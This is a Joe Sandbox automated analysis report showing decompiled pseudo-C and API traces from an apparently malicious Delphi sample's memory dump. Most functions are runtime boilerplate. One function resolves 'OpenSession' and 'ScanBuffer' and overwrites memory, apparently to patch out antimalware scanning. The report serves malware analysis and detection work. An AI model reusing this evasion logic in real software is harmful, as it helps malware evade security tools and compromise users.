0x02722fb0
0x02722fb1
0x00000000
0x02722fa8
0x02722f66
0x02722f83
0x02722f70
0x02722f74
0x00000000
0x00000000
0x00000000
0x00000000
0x02722f76
0x02722f76
0x02722f79
0x02722f7d
0x02722f7e
0x02722f7f
0x02722f76
0x02722f90
0x02722f98
0x02722f98
0x02722f90
0x02722fc1
0x02722ef0
0x02722ef0
0x00000000
0x02722ef0
0x02722ee8

APIs

CharNextA.USER32(00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize), ref: 02722F02
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession,0273E77C), ref: 02722F0C
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession,0273E77C), ref: 02722F2B
CharNextA.USER32(00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize), ref: 02722F35
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession,0273E77C), ref: 02722F61
CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession), ref: 02722F6B
CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession), ref: 02722F93
CharNextA.USER32(00000000,00000000,?,?,00000000,00000000,?,0272300A,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession,0273E77C), ref: 02722F9D

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 8ac23a6a179341efb2a46d170a315450a42e94bf23a1cc473fad95e56f2766c4
Instruction ID: d03d64cd6a711d52a65ab22959f30a9452ae6826b7e50fd1ec1390aafa3919da
Opcode Fuzzy Hash: 8ac23a6a179341efb2a46d170a315450a42e94bf23a1cc473fad95e56f2766c4
Instruction Fuzzy Hash: 41318691A0C3F12EEB33A6748CC872A7EC55B4F254F0809A5DD465B247D7B8C44DC762

Uniqueness

Uniqueness Score: -1.00%

Function 0272B0B8 Relevance: 10.6, APIs: 7, Instructions: 56
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272B0B8(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0272AF30(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x2740e70; // 0x2741044
				if( *_t14 == 0) {
					_t16 =  *0x2740d6c; // 0x2726b54
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x27437f0; // 0x2720000
					LoadStringA(E02725AF0(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x2740d90; // 0x2741214
				E02722D28(E027233B0(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E027282CC( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x272b17c, 2,  &_v1092, 0);
			}

0x0272b0c7
0x0272b0cc
0x0272b0d4
0x0272b13b
0x0272b140
0x0272b144
0x0272b14f
0x00000000
0x0272b165
0x0272b0d6
0x0272b0e0
0x0272b0ef
0x0272b0ff
0x0272b112
0x00000000

APIs

Part of subcall function 0272AF30: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0272AF4D
Part of subcall function 0272AF30: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0272AF71
Part of subcall function 0272AF30: GetModuleFileNameA.KERNEL32(02720000,?,00000105), ref: 0272AF8C
Part of subcall function 0272AF30: LoadStringA.USER32 ref: 0272B022

CharToOemA.USER32 ref: 0272B0EF
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0272B10C
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0272B112
GetStdHandle.KERNEL32(000000F4,0272B17C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0272B127
WriteFile.KERNEL32(00000000,000000F4,0272B17C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0272B12D
LoadStringA.USER32 ref: 0272B14F
MessageBoxA.USER32 ref: 0272B165

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: a53d5f6c4af267dba78c7563ae845afe20b65d5d03fe2c91c16dd585639f26d5
Instruction ID: c16d9f224c2350d07a056b328506b4e2a2bc0314921cefb187a7cca3cb86ed9d
Opcode Fuzzy Hash: a53d5f6c4af267dba78c7563ae845afe20b65d5d03fe2c91c16dd585639f26d5
Instruction Fuzzy Hash: 3B115EB6554220AED202E7A4CC89F9B7BEDAB45300F40491BF345E60E1DF71E94C8F66

Uniqueness

Uniqueness Score: -1.00%

Function 02738A30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02738A30(void* __eax, void* __ebx, short __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				struct _STARTUPINFOA _v72;
				struct _PROCESS_INFORMATION _v88;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				CHAR* _t49;
				int _t54;
				void* _t67;
				intOrPtr _t83;
				short _t86;
				void* _t88;
				void* _t91;

				_t93 = __eflags;
				_v360 = 0;
				_v368 = 0;
				_v364 = 0;
				_v348 = 0;
				_v352 = 0;
				_v356 = 0;
				_t86 = __ecx;
				_t88 = __edx;
				_t67 = __eax;
				_push(_t91);
				_push(0x2738b94);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffe94;
				_push(0x2738bac);
				E02724B04( &_v352, __eax, __eflags);
				_push(_v352);
				_push(0x2738bb8);
				E02724B04( &_v356, _t88, __eflags);
				_push(_v356);
				E02724C24();
				E02724B3C( &_v344, 0xff, _v348);
				E02723518( &_v72, 0x44);
				_v72.cb = 0x44;
				_v72.dwFlags = 1;
				_v72.wShowWindow = _t86;
				E02724B04( &_v364, _t67, _t93);
				E02728194(_v364,  &_v360);
				_t49 = E02724D64(_v360);
				E02724B04( &_v368,  &_v344, _t93);
				_t54 = CreateProcessA(0, E02724D64(_v368), 0, 0, 0, 0x30, 0, _t49,  &_v72,  &_v88);
				asm("sbb eax, eax");
				if(_t54 + 1 != 0) {
					WaitForSingleObject(_v88.hProcess, 0xffffffff);
					CloseHandle(_v88);
					CloseHandle(_v88.hThread);
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x2738b9b);
				return E027248C4( &_v368, 6);
			}

0x02738a30
0x02738a3e
0x02738a44
0x02738a4a
0x02738a50
0x02738a56
0x02738a5c
0x02738a62
0x02738a64
0x02738a66
0x02738a6a
0x02738a6b
0x02738a70
0x02738a73
0x02738a76
0x02738a83
0x02738a88
0x02738a8e
0x02738a9b
0x02738aa0
0x02738ab1
0x02738ac7
0x02738ad6
0x02738adb
0x02738ae2
0x02738ae9
0x02738afd
0x02738b0e
0x02738b19
0x02738b35
0x02738b48
0x02738b50
0x02738b57
0x02738b5f
0x02738b68
0x02738b71
0x02738b71
0x02738b78
0x02738b7b
0x02738b7e
0x02738b93

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02738B48
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02738B5F
CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02738B68
CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02738B71

Strings

D, xrefs: 02738ADB

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle$CreateObjectProcessSingleWait
String ID: D
API String ID: 2059082233-2746444292
Opcode ID: 6b253ca39f4b2b8c918279bafc242851ff3dc7130780e3582267318f0565fe06
Instruction ID: 56d56eb0b0b7b335241f1e021906c499470bacedceb1eac5e03c3637ed66bcd2
Opcode Fuzzy Hash: 6b253ca39f4b2b8c918279bafc242851ff3dc7130780e3582267318f0565fe06
Instruction Fuzzy Hash: 483172B0A003699BDB22EF94CC95FDEB7B9EF49300F5041E5E508A7240DA759E89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02723B00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02723B00() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x2740024 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t14 =  *0x2740024 & 0xffc0 | _v12 & 0x3f;
					 *0x2740024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E02723B71);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x2723b78);
					return RegCloseKey(_v8);
				}
			}

0x02723b01
0x02723b03
0x02723b0d
0x02723b29
0x02723b8b
0x02723b8e
0x02723b97
0x02723b2b
0x02723b2d
0x02723b2e
0x02723b33
0x02723b36
0x02723b39
0x02723b55
0x02723b5c
0x02723b5f
0x02723b62
0x02723b70
0x02723b70

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02723B22
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02723B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02723B55
RegCloseKey.ADVAPI32(?,02723B78,00000000,?,00000004,00000000,02723B71,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02723B6B

Strings

FPUMaskValue, xrefs: 02723B4C
SOFTWARE\Borland\Delphi\RTL, xrefs: 02723B18

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: aa6ce708ef0378ee42a593b3825a363a2d14c070d9197d7cdf535871f1b39985
Instruction ID: 4f47e13770d48fc2ad3591ab13958dcb81173c9c98dbb4df01e01f9821191ab6
Opcode Fuzzy Hash: aa6ce708ef0378ee42a593b3825a363a2d14c070d9197d7cdf535871f1b39985
Instruction Fuzzy Hash: 6D01B579A40368BAFB11EFA08C42FBA77ECE708B01F5044A6FA04D6580E6785A14DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0272AC44 Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0272AC44(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x272acdb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0272A9B8(GetThreadLocale(), 0x272acf0, 0x100b,  &_v8);
				_t29 = E02727DC4(0x272acf0, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0272AB90, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x27438f0;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0272ABCC, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0272ACE2);
				return E027248A0( &_v8);
			}

0x0272ac44
0x0272ac47
0x0272ac4c
0x0272ac4d
0x0272ac52
0x0272ac55
0x0272ac6b
0x0272ac7d
0x0272ac87
0x0272ac97
0x0272ac9c
0x0272aca1
0x0272aca6
0x0272aca6
0x0272acac
0x0272acaf
0x0272acaf
0x0272acc0
0x0272acc0
0x0272acc7
0x0272acca
0x0272accd
0x0272acda

APIs

GetThreadLocale.KERNEL32(?,00000000,0272ACDB,?,?,00000000), ref: 0272AC5C

Part of subcall function 0272A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0272A9D6

GetThreadLocale.KERNEL32(00000000,00000004,00000000,0272ACDB,?,?,00000000), ref: 0272AC8C
EnumCalendarInfoA.KERNEL32(Function_0000AB90,00000000,00000000,00000004), ref: 0272AC97
GetThreadLocale.KERNEL32(00000000,00000003,00000000,0272ACDB,?,?,00000000), ref: 0272ACB5
EnumCalendarInfoA.KERNEL32(Function_0000ABCC,00000000,00000000,00000003), ref: 0272ACC0

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: bb027de95151ecbfe75d5da4a706be892392e9d0048ba363da03aaabf8b65cbe
Instruction ID: 0c2fd56dec6b641aea1dd40b4a1876b87b3a3386755286ef3f73a387b37b60b9
Opcode Fuzzy Hash: bb027de95151ecbfe75d5da4a706be892392e9d0048ba363da03aaabf8b65cbe
Instruction Fuzzy Hash: 150176B02002B42FF313BB74CC12F2E7A5EDB06720F620461F400E66C0EA249E088AA0

Uniqueness

Uniqueness Score: -1.00%

Function 02735F6C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E02735F6C(signed int __eax, void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				char _v112;
				void* _t69;
				signed int _t100;
				signed int _t101;
				intOrPtr _t104;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t116;
				signed int _t120;
				signed int _t157;
				void* _t200;
				signed int _t204;
				void* _t218;
				void* _t223;
				intOrPtr _t224;
				void* _t225;
				intOrPtr _t226;
				signed int _t227;
				void* _t232;
				void* _t237;
				intOrPtr _t238;
				intOrPtr _t239;
				void* _t245;
				void* _t250;
				intOrPtr _t251;
				signed int _t257;
				intOrPtr _t259;
				intOrPtr _t260;

				_t259 = _t260;
				_t200 = 0xd;
				do {
					_push(0);
					_push(0);
					_t200 = _t200 - 1;
				} while (_t200 != 0);
				_push(_t200);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t257 = __eax;
				_push(_t259);
				_push(0x2736329);
				_push( *[fs:eax]);
				 *[fs:eax] = _t260;
				_t69 = E0272304C(0x270e);
				_push(_t69);
				L027358FC();
				if(_t69 == 0) {
					E027248F4(0x2744598, 0x2736350);
				} else {
					E027248F4(0x2744598, 0x2736340);
				}
				_push(0x273635c);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v12, E02724D64(_v16));
				_push(_v12);
				E02724BB0( &_v24,  *0x2744598, 0x273635c);
				E02724A98( &_v20, E02724D64(_v24));
				_pop(_t218);
				E02733690(_v20, 0x2744580, _t218, _t257);
				_push(0x273635c);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v28, E02724D64(_v32));
				_push(_v28);
				E02724BB0( &_v40,  *0x2744598, 0x273635c);
				E02724A98( &_v36, E02724D64(_v40));
				_pop(_t223);
				E02733690(_v36, 0x2744580, _t223, _t257);
				 *0x274457c = _t257;
				while(1) {
					_t100 =  *0x274457c; // 0x0
					if( *((intOrPtr*)(_t100 + 0xc)) == 0) {
						break;
					}
					_t101 =  *0x274457c; // 0x0
					 *0x274458c =  *((intOrPtr*)(_t101 + 0xc)) +  *0x2744538;
					_push(0x2744590);
					_t104 =  *0x2744568; // 0x0
					_v8 = _t104;
					_push(E02725850());
					_t224 =  *0x274458c; // 0x0
					E02724A98( &_v44, _t224);
					_pop(_t225);
					_t109 = E02735958(_v8, 0x2744580, _v44, _t225, 0x2744598, _t257);
					__eflags = _t109;
					if(_t109 == 0) {
						_push(0x273635c);
						_push( *0x2744598);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v48, E02724D64(_v52));
						_push(_v48);
						E02724BB0( &_v60,  *0x2744598, 0x273635c);
						E02724A98( &_v56, E02724D64(_v60));
						_pop(_t245);
						E02733690(_v56, 0x2744580, _t245, _t257);
						_push(0x273635c);
						_push( *0x2744598);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v64, E02724D64(_v68));
						_push(_v64);
						E02724BB0( &_v76,  *0x2744598, 0x273635c);
						E02724A98( &_v72, E02724D64(_v76));
						_pop(_t250);
						E02733690(_v72, 0x2744580, _t250, _t257);
						_t251 =  *0x274458c; // 0x0
						E02724A98( &_v80, _t251);
						E02735BC0( *((intOrPtr*)(_a4 - 4)), 0x2744580, _v80, 0x2744598, _t257, __eflags);
					}
					_t110 =  *0x274457c; // 0x0
					__eflags =  *(_t110 + 4);
					if( *(_t110 + 4) != 0) {
						_t111 =  *0x274457c; // 0x0
						 *0x2744580 =  *_t111 +  *0x2744538;
					} else {
						_t157 =  *0x274457c; // 0x0
						 *0x2744580 =  *((intOrPtr*)(_t157 + 0x10)) +  *0x2744538;
					}
					while(1) {
						_t257 =  *( *0x2744580);
						__eflags = _t257;
						if(_t257 == 0) {
							break;
						}
						_t116 = E02735F60(_t257);
						__eflags = _t116;
						if(_t116 == 0) {
							_t120 =  *( *0x2744580) +  *0x2744538 + 2;
							__eflags = _t120;
							 *0x2744584 = _t120;
							_t204 =  *0x2744584; // 0x0
							_t226 =  *0x274458c; // 0x0
							 *0x2744588 = E02735CD8( *((intOrPtr*)(_a4 - 4)), _t204, _t226, _t120);
						} else {
							_push(0x273635c);
							_push( *0x2744598);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v84, E02724D64(_v88));
							_push(_v84);
							E02724BB0( &_v96,  *0x2744598, 0x273635c);
							E02724A98( &_v92, E02724D64(_v96));
							_pop(_t232);
							E02733690(_v92, 0x2744580, _t232, _t257);
							_push(0x273635c);
							_push( *0x2744598);
							_push("ScanBuffer");
							E02724C24();
							E02724A98( &_v100, E02724D64(_v104));
							_push(_v100);
							E02724BB0( &_v112,  *0x2744598, 0x273635c);
							E02724A98( &_v108, E02724D64(_v112));
							_pop(_t237);
							E02733690(_v108, 0x2744580, _t237, _t257);
							_t238 =  *0x274458c; // 0x0
							 *0x2744588 = E02735CD8( *((intOrPtr*)(_a4 - 4)),  *( *0x2744580) & 0x0000ffff, _t238, __eflags);
						}
						_t227 =  *0x2744588; // 0x0
						 *( *0x2744580) = _t227;
						 *0x2744580 =  &(( *0x2744580)[1]);
						__eflags =  *0x2744580;
					}
					 *0x274457c =  *0x274457c + 0x14;
					__eflags =  *0x274457c;
				}
				_pop(_t239);
				 *[fs:eax] = _t239;
				_push(0x2736330);
				return E027248C4( &_v112, 0x1a);
			}

0x02735f6d
0x02735f6f
0x02735f74
0x02735f74
0x02735f76
0x02735f78
0x02735f78
0x02735f7b
0x02735f7c
0x02735f7d
0x02735f7e
0x02735f7f
0x02735f8d
0x02735f8e
0x02735f93
0x02735f96
0x02735f9e
0x02735fa3
0x02735fa4
0x02735fab
0x02735fc2
0x02735fad
0x02735fb4
0x02735fb4
0x02735fc7
0x02735fcc
0x02735fce
0x02735fdb
0x02735fed
0x02735ff5
0x02736000
0x02736012
0x0273601a
0x0273601b
0x02736020
0x02736025
0x02736027
0x02736034
0x02736046
0x0273604e
0x02736059
0x0273606b
0x02736073
0x02736074
0x02736079
0x027362ff
0x027362ff
0x02736308
0x00000000
0x00000000
0x02736084
0x02736092
0x02736097
0x0273609c
0x027360a1
0x027360a9
0x027360ad
0x027360b3
0x027360be
0x027360bf
0x027360c4
0x027360c6
0x027360cc
0x027360d1
0x027360d3
0x027360e0
0x027360f2
0x027360fa
0x02736105
0x02736117
0x0273611f
0x02736120
0x02736125
0x0273612a
0x0273612c
0x02736139
0x0273614b
0x02736153
0x0273615e
0x02736170
0x02736178
0x02736179
0x02736181
0x02736187
0x02736195
0x02736195
0x0273619a
0x0273619f
0x027361a3
0x027361ba
0x027361c7
0x027361a5
0x027361a5
0x027361b3
0x027361b3
0x027362ec
0x027362ee
0x027362f0
0x027362f2
0x00000000
0x00000000
0x027361d0
0x027361d5
0x027361d7
0x027362bb
0x027362bb
0x027362be
0x027362c9
0x027362cf
0x027362da
0x027361dd
0x027361dd
0x027361e2
0x027361e4
0x027361f1
0x02736203
0x0273620b
0x02736216
0x02736228
0x02736230
0x02736231
0x02736236
0x0273623b
0x0273623d
0x0273624a
0x0273625c
0x02736264
0x0273626f
0x02736281
0x02736289
0x0273628a
0x0273629f
0x027362aa
0x027362aa
0x027362e1
0x027362e7
0x027362e9
0x027362e9
0x027362e9
0x027362f8
0x027362f8
0x027362f8
0x02736310
0x02736313
0x02736316
0x02736328

APIs

InetIsOffline.URL(00000000,00000000,02736329,?,?,?,?,0000000C,00000000,00000000), ref: 02735FA4

Part of subcall function 02735958: lstrcmpiA.KERNEL32(00000000,00000000,00000000,02735A18), ref: 027359D5

Part of subcall function 02733690: LoadLibraryA.KERNEL32(00000000,00000000,02733766), ref: 027336CA
Part of subcall function 02733690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02733766), ref: 027336D4
Part of subcall function 02733690: GetProcAddress.KERNEL32(77880000,00000000), ref: 027336FD
Part of subcall function 02733690: RtlMoveMemory.N(027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273371E
Part of subcall function 02733690: GetCurrentProcess.KERNEL32(027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 02733735
Part of subcall function 02733690: NtFlushVirtualMemory.N(00000000,027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273373B
Part of subcall function 02733690: FreeLibrary.KERNEL32(77880000,00000000,00000000,00000000,02733766), ref: 02733746

Part of subcall function 02735BC0: GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,02735C73), ref: 02735BED
Part of subcall function 02735BC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02735BF3
Part of subcall function 02735BC0: GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02735C73), ref: 02735C07
Part of subcall function 02735BC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 02735C0D
Part of subcall function 02735BC0: CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,00000000,kernel32,Sleep,00000000,02735C73), ref: 02735C56

Strings

ScanBuffer, xrefs: 02736027, 0273612C, 0273623D
OpenSession, xrefs: 02735FCE, 027360D3, 027361E4
teSe, xrefs: 02735FAF

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Handle$AddressModuleProc$LibraryMemory$CloseCurrentFlushFreeInetLoadMoveOfflineProcessVirtuallstrcmpi
String ID: OpenSession$ScanBuffer$teSe
API String ID: 2575397957-3424172483
Opcode ID: dd490cf67cdddd126745ccf3328b552d2f5ad51da282fb623fe66700c3c8282f
Instruction ID: 3dcdb5ae690983e774a19c6e2756d93579d5498a755d5bcbdd04b41d4655b9f6
Opcode Fuzzy Hash: dd490cf67cdddd126745ccf3328b552d2f5ad51da282fb623fe66700c3c8282f
Instruction Fuzzy Hash: 88B13175A00218EFDB03EB94D8A4A9EB7FAFF49300F118466E511AB315DB30AD19DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0272ACF4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0272ACF4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x272aec4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E027248A0(__edx);
				E0272A9B8(GetThreadLocale(), 0x272aedc, 0x1009,  &_v12);
				if(E02727DC4(0x272aedc, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						__eflags = _t92 - E02724B60(_t124);
						if(__eflags > 0) {
							goto L28;
						}
						asm("bt [0x274082c], eax");
						if(__eflags >= 0) {
							_t45 = E02728328(_t124 + _t92 - 1, 2, 0x272aee0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E02728328(_t124 + _t92 - 1, 4, 0x272aef0);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E02728328(_t124 + _t92 - 1, 2, 0x272af08);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E02724B6C(_t122, 0x272af20);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E02724A88();
												E02724B6C(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E02724B6C(_t122, 0x272af14);
										_t92 = _t92 + 1;
									}
								} else {
									E02724B6C(_t122, 0x272af00);
									_t92 = _t92 + 3;
								}
							} else {
								E02724B6C(_t122, 0x272aeec);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0272BC90(_t124, _t92);
							E02724DC4(_t124, _v8, _t92,  &_v20);
							E02724B6C(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x27438c8; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E027248F4(_t122, _t124);
					} else {
						while(_t92 <= E02724B60(_t124)) {
